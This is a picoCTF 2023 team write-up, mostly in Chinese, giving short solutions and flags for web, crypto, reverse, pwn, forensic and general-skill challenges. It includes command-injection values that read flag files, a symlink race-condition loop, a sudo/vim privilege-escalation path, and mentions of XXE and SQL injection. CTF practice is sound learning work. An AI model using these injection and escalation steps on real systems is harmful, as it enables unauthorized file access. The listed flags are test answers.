picoCTF2023 writeup

# picoCTF2023 writeup ###### tags: `Cyber`、`CCUISC` > [name=Terry] > [name=SKYSKY] > [name=Sherry] > [name=Calmtea5209] > [name=小鹿] 全球學生排名![](https://i.imgur.com/XRaFP8z.png) ## Web ### MatchTheRegex :::spoiler web ``` html <body> <h1 class="heading">PicoCTF</h1> <p></p> <div class="normal-form"> <h2 id="sub-heading">Valid Input</h2> <form action="#" onsubmit="return send_request()"> <input type="text" id="name" name="input" placeholder="Input text"> <br> <br> <button id="submit-but" type="submit" id="submit-button">SUBMIT</button> </form> </div> </body> <script> function send_request() { let val = document.getElementById("name").value; // ^p.....F!? fetch(`/flag?input=${val}`) .then(res => res.text()) .then(res => { const res_json = JSON.parse(res); alert(res_json.flag) return false; }) return false; } </script> ``` ::: chatGPT加持w 他的路徑會是：/flag?input=我們輸入的東西/ 正則表達式：`^picoCTF\{[a-zA-Z0-9]+\}$` `picoCTF{succ3ssfully_matchtheregex_08c310c6}` ### findme 仔細觀察發現登入時有重新導向，在curl -v 兩個網址後沒發現東西，白癡地卡了一段時間，最後把兩個網址拿去base64 decode `picoCTF{proxies_all_the_way_df44c94c}` ### More SQLi 丟進burpsuit看一下就有了 `picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_e3e46aae}` ### SOAP 丟進BurpSuite 點其中一個Detail會有這個畫面 ![](https://i.imgur.com/NLirCfy.png) ![](https://i.imgur.com/AMcNHfP.png) 照著[教學](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)，flag就出來了 `picoCTF{XML_3xtern@l_3nt1t1ty_e5f02dbf}` ## Crypto ### rotation Caesar - Maintain case：維持原大小寫 `picoCTF{r0tat1on_d3crypt3d_fd5c4283}` ### ReadMyCert - CSR 是一個加密過的文字檔，常用於非驗證式加密的公鑰系統頒發，代表申請人發送到證書頒發機構以申請數字身份證書的訊息，通常會記載身份認證(數位簽章)以及使用憑證的Domain（主域名、子域名或萬用字元域名） - openssl：`openssl req -in readmycert.csr -noout -text` `picoCTF{read_mycert_60f83ace}` ### HideToSee ~~WinHex~~、~~stegsolve~~、~~binwalk~~ ⭕[Steghide](https://linuxhint.com/steghide-beginners-tutorial/) 1. ![](https://i.imgur.com/ylF8Ml4.png) 2. encrypted.txt 拿去 atbash decode `picoCTF{atbash_crack_1f84d779}` ## Reverse ### Reverse strings ./reverse | grep "picoCTF" `picoCTF{3lf_r3v3r5ing_succe55ful_d55531cd}` ### timer unzip 之後把檔案 strings 一遍就有 flag 了 `picoCTF{t1m3r_r3v3rs3d_succ355fully_17496}` ### safe opener 2 跟 Reverse 的解法完全一樣 `picoCTF{SAf3_0p3n3rr_y0u_solv3d_it_6a2f371a}` ### Ready Gladiator 0 亂打就噴出 flag 了，笑死 ~~甚至沒讀 source code~~ ![](https://i.imgur.com/d79z4ks.png) `picoCTF{h3r0_t0_z3r0_4m1r1gh7_a7bf8a57}` ## pwn ### two-sum integer overflow `picoCTF{Tw0_Sum_Integer_Bu773R_0v3rfl0w_e0d38c85}` ### hijacking sudo -l 發現可以用 sudo 執行 /home/picoctf/.server.py 然後用 vim 把內容改掉， :w! 會直接寫入之後就可以用 chmod 把權限調成 777 flag 在 /home/challenge/metadata.json ![](https://i.imgur.com/xmK2sJy.png) `picoCTF{pYth0nn_libraryH!j@CK!n9_b5908c8d}` ### VNE ``` export SECRET_DIR="/root/flag.txt;cat /root/flag.txt" ./bin ``` 笑死有夠通靈 `picoCTF{Power_t0_man!pul4t3_3nv_c183c127}` ### tic-tac race condition exploit 不是 100 % 成功，要多試幾次去撞 race condition ``` echo public msg > public; echo flip test > flip while true; do ln -sf flag.txt flip; ln -sf public flip ; done & [2] 3000 for i in {1..100};do ./txtreader flip;done ``` `picoCTF{ToctoU_!s_3a5y_5748402c}` ## forensic ### PcapPoisoning `picoCTF{P64P_4N4L7S1S_SU55355FUL_b151bc51}` ### hideme binwalk `picoCTF{Hiddinng_An_imag3within@n_ima9e_c0ea1bd4}` ### MSB MSB 隱寫 ![](https://i.imgur.com/o6fn2zb.jpg) 文字內容，裡面有 flag `picoCTF{15_y0ur_que57_qu1x071c_0r_h3r01c_00e09493}` ### who is it strings 後會看到一個 IP whois 173.249.33.206 `picoCTF{WilhelmZwalina}` ## General Skill ### Permission 用 vi 打開 /root/.flag.txt `picoCTF{uS1ng_v1m_3dit0r_c2307ca8}` ### chrono cat /challenge/flag.txt `picoCTF{Sch3DUL7NG_T45K3_L1NUX_e441b7a9}` ### Special 他好像只會處理前面幾個字，弄長一點的 payload 就好了 `lslslsls;cat ../../challenge/metadata.json` ~~這題怎麼 300 分，怕.jpg~~ `picoCTF{5p311ch3ck_15_7h3_w0r57_d6a5ad81}` ### repetitions 一直用base64 decode就可以解出來了 `picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_dbc4340a}` ### Rules 2023 `picoCTF{h34rd_und3r5700d_4ck_cba1c711}` ### Specialer 題目 ban 了一堆指令但可以用 cd 加上 tab 的提示看到有哪些檔案、用 `echo $(<filename)` 看檔案內容 ``` cd ala echo $(<kazam.txt) ``` `picoCTF{y0u_d0n7_4ppr3c1473_wh47_w3r3_d01ng_h3r3_c42168d9}` ### useless :::spoiler cat過後的程式碼 ``` #!/bin/bash # Basic mathematical operations via command-line arguments if [ $# != 3 ] then echo "Read the code first" else if [[ "$1" == "add" ]] then sum=$(( $2 + $3 )) echo "The Sum is: $sum" elif [[ "$1" == "sub" ]] then sub=$(( $2 - $3 )) echo "The Substract is: $sub" elif [[ "$1" == "div" ]] then div=$(( $2 / $3 )) echo "The quotient is: $div" elif [[ "$1" == "mul" ]] then mul=$(( $2 * $3 )) echo "The product is: $mul" else echo "Read the manual" fi fi ``` ::: `man useless`後得到答案 - [man](https://blog.gtwang.org/linux/linux-man-page-command-examples/)：manual page的簡寫，是一種文件說明格式，例如:`man ls`就會寫出ls的指令用法 `picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_7065}`